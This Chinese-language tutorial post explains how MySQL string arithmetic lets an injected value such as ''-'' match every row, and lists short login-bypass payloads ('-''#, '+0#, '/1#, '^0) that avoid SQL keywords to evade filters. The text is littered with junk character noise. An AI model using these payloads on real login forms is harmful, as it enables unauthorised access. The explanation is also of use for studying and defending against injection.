使用MySQL字符串运算实施精巧化SQL注入攻击

admin

我们先来看这样一个场景。 0 [% U+ X( J; S/ `0 Z$ Q有以下表结构： % x/ i8 f1 R6 R. u. M* z9 k& ] mysql> desc admin; +----------+--------------+------+-----+---------+----------------+ | Field    | Type         | Null | Key | Default | Extra          | +----------+--------------+------+-----+---------+----------------+ 9 H, _6 \4 c& r) S3 F; E| id       | mediumint(9) | NO   | PRI | NULL    | auto_increment | " r6 w6 U5 M$ j| name     | char(32)     | NO   | UNI | NULL    |                | | password | char(32)     | NO   | UNI | NULL    |                | : u" o& {! G+ x& ~& n7 W' N+----------+--------------+------+-----+---------+----------------+ " G, k5 Q: ^# x; w4 X1 n" Q3 rows in set (0.00 sec)   e" J( O+ d7 s$ Q! q5 Q1 [) Y$ e执行select * from admin;，成功返回所有记录内容。 % W: V( j3 b5 S# S7 V- ~+----+--------+----------------------------------+ | id | name   | password                         | 2 P2 Y  m3 s2 `6 V% [: f+ Y+----+--------+----------------------------------+ 9 I3 X3 ?" U( D6 T! W|  1 | admin  | c6dabaeeb05f2bf8690bab15e3afb022 | |  2 | pnig0s | 998976f44e2a668k5dc21e54b3401645 | " ]6 z# k! p8 z! c$ b9 ]|  4 | n00b   | ff80e8508d39047460921792273533a4 | +----+--------+----------------------------------+ 3 rows in set (0.00 sec) / x  M. g3 k3 n. N+ T! I执行select * from admin where name=”;，没有匹配到任何记录。 3 T1 s$ N( v, P7 i/ M  g9 Cmysql> select * from admin where name = '';   V& O" G: H6 T7 E3 B& SEmpty set (0.00 sec) 那么我们来执行select * from admin where name = ”-”; / _- q( h& V+ n' y4 N* \+ a) J( _ + s' p) f; K/ H# d) W+----+--------+----------------------------------+ $ O$ E7 H4 g  L0 x6 c6 q% d4 a% {' @* V; Q| id | name   | password                         | +----+--------+----------------------------------+ ! s2 j1 T' T4 q$ c|  1 | admin  | c6dabaeeb05f2bf8690bab15e3afb022 | |  2 | pnig0s | 998976f44e2a668k5dc21e54b3401645 | 5 w, U7 E: d7 v  L$ H|  4 | n00b   | ff80e8508d39047460921792273533a4 | * V( {5 g& R8 {1 P, _$ g+----+--------+----------------------------------+ , c* c: [! z/ L% Q7 T3 Z  w5 F7 A3 rows in set, 3 warnings (0.00 sec) 可以看到，也成功返回了所有记录，但是有三个warnings，我们看下警告信息： ) N5 _- N' R' x+ Z 8 P/ S" t& ~( c- @8 E+ S8 B3 dmysql> show warnings; 3 ~! ~* h$ I4 M' f. ~; ~$ T+---------+------+------------------------------------------ | Level   | Code | Message +---------+------+------------------------------------------ 4 |- A" ~; A% c| Warning | 1292 | Truncated incorrect DOUBLE value: 'admin | Warning | 1292 | Truncated incorrect DOUBLE value: 'pnig0s | Warning | 1292 | Truncated incorrect DOUBLE value: 'n00b +---------+------+------------------------------------------ ! t7 n; c3 K+ u0 N3 rows in set (0.00 sec) : E) v9 L! A1 w9 q$ t9 C提示截断了错误的DOUBLE值’admin等等，当在一个字符串类型的列中使用数字类型的值时会产生这类警告。 我们单独执行select ”-”;看下结果。 9 o. j3 h% O2 h  _% f& |' O  S$ e & x2 m  @4 i, d5 n) @+ vmysql> select ''-''; +-------+ | ''-'' | $ |* O0 F5 z, `1 E) m7 W+-------+ |     0 | +-------+ 1 n8 a( q2 j- x" T1 row in set (0.00 sec) 返回0，也就是说我们查询的每一行的name子段都会和0做对比，这样就会触发一个类型转换，对name字段转换的结果也必然为0： : m! V: y9 v( V+ k# j( n  d' d mysql> select CAST((select name from admin limit 1,1) as DECIMAL); +-----------------------------------------------------+ | CAST((select name from admin limit 1,1) as DECIMAL) | +-----------------------------------------------------+ 1 q$ P4 r& u0 ]  Y|                                                   0 | +-----------------------------------------------------+ 1 row in set, 1 warning (0.00 sec) 3 h7 ^; Z; l' L. ?7 U因此where语句构成了相等的条件，where 0=”=”，记录被返回。 ; w; D( d7 C$ \- u  V 9 }: f: O: j! Q$ Q! M/ f9 ~  |; aSQL注入场景: http://www.sqlzoo.net/hack/ : X# G  ^4 I0 `% W( h4 W " r! D# S6 U/ z; `1 U# c. Y % G/ C9 ]* p. D- Q6 S$ S9 |如果我们想绕过登录验证，上面已经给出了一个传统的tips：用户名密码均为’ or ”=’ 这样的逻辑和绕过方式很常见，这里不再具体解释了。 & v& s3 ^( C7 k/ s7 B - X3 y; I  O+ i* r1 T# _那么通过这次发现的技巧，可以使用一种相当精巧的方式，且避免使用SQL关键字，来绕过登录。 # G+ M3 d5 b5 |7 ^4 G6 o% E0 V 7 {/ |; O+ `) q " j. \* h5 a+ R仅仅在name子段输入’-”#，password留空，即可绕过登录验证。 1 f0 D) x( B4 p 1 O9 c( k: \# k5 N& x0 N    : d0 ?& N) A  u $ K, I+ d; y3 e4 S% R6 ^" e除了”-”，其他运算符”+”,”*”,”^”都会有同样的效果。 再继续进行测试，我们发现只要在闭合单引号的情况系构造查询结果为0的条件即可 - t0 N4 D1 v0 a, r) V. R4 A 5 M$ C/ Y1 `  b& F mysql> select ''/1; : W% w  K9 j( {6 _/ `) E7 `. N+------+ | ''/1 | +------+ |    0 | +------+ 1 row in set (0.00 sec) 0 C" p: D: Z. I类似的”+0,”-0,”*0,”^0均可。 那么刚才的注入环境我们使用以下的精简payload同样可以绕过登录认证： ‘+0#，’/1#，’^0，’-0#等等。   4 |& q' z$ [* A# K! }% g, L利用这样一种特性，当目标对注入语句中的SQL关键字进行过滤时，便可通过这样一种方式进行Bypass。